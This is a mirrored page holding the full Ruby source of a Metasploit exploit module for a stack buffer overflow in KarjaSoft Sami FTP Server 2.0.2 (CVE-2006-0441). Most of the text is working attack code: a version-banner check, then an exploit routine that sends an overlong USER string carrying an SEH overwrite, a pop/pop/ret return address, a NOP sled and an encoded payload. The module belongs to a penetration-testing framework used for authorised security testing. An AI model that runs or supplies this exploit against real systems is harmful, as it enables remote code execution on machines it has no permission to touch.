CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/ftp/sami_ftpd_user.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh10prepend Msf::Exploit::Remote::AutoCheck1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'KarjaSoft Sami FTP Server v2.0.2 USER Overflow',17'Description' => %q{18This module exploits an unauthenticated stack buffer overflow in19KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long20USER string during login.2122The payload is triggered when the administrator opens the application23GUI. If the GUI window is open at the time of exploitation, the24payload will be executed immediately. Keep this in mind when selecting25payloads. The application will crash following execution of the26payload and will not restart automatically.2728When the application is restarted, it will re-execute the payload29unless the payload has been manually removed from the SamiFTP.binlog30log file.3132This module has been tested successfully on Sami FTP Server versions:332.0.2 on Windows XP SP0 (x86);342.0.2 on Windows 7 SP1 (x86);352.0.2 on Windows 7 SP1 (x64); and362.0.2 on Windows 10 (1909) (x64).37},38'Author' => [39'Muhammad Ahmed Siddiqui', # Discovery40'Critical Security', # Perl exploit41'n30m1nd', # Python exploit - SEH overwrite with 2.0.2 universal tmp01.dll p/p/r42'aushack', # Metasploit43'bcoles' # Metasploit44],45'Arch' => [ ARCH_X86 ],46'License' => MSF_LICENSE,47'References' =>48[49# This vulnerability appears to have been reported multiple times.50['CVE', '2006-0441'],51['CVE', '2006-2212'],52['OSVDB', '25670'],53['BID', '16370'],54['BID', '22045'],55['BID', '17835'],56['EDB', '1448'],57['EDB', '1452'],58['EDB', '1462'],59['EDB', '3127'],60['EDB', '3140'],61['EDB', '40675']62],63'DefaultOptions' =>64{65'EXITFUNC' => 'seh'66},67'Platform' => ['win'],68'Privileged' => false,69'Payload' =>70{71'Space' => 800,72'BadChars' => "\x00\x0a\x0d\x20\xff",73'EncoderType' => Msf::Encoder::Type::AlphanumMixed74},75'Targets' =>76[77['Sami FTP Server version 2.0.2', { 'Ret' => 0x10022ADE }], # p/p/r tmp01.dll78],79'Notes' => {80'Stability' => [ CRASH_SERVICE_DOWN ]81},82'DisclosureDate' => '2006-01-24'83)84)8586register_options([87Opt::RPORT(21)88])89end9091def check92connect93banner = sock.get_once(-1, 3)94disconnect9596unless banner.include?('Sami FTP Server')97return CheckCode::Safe('Target is not Sami FTP Server')98end99100if banner.include?('Sami FTP Server 2.0.2')101return CheckCode::Appears('Sami FTP Server version 2.0.2.')102end103104CheckCode::Detected105end106107def exploit108connect109110nseh = "\xeb\x06"111nseh << rand_text_alpha(2)112seh = [target.ret].pack('V')113114user = rand_text_alpha(596)115user << nseh116user << seh117user << "\x90" * 10118user << payload.encoded119user << "\x90" * (800 - payload.encoded.length)120121print_status("Sending payload (#{user.length} bytes) ...")122sock.put("USER #{user}\r\n")123sock.recv(4096)124125sock.put("PASS #{Rex::Text.rand_char(payload_badchars)}\r\n")126sock.recv(4096)127128handler129disconnect130end131end132133134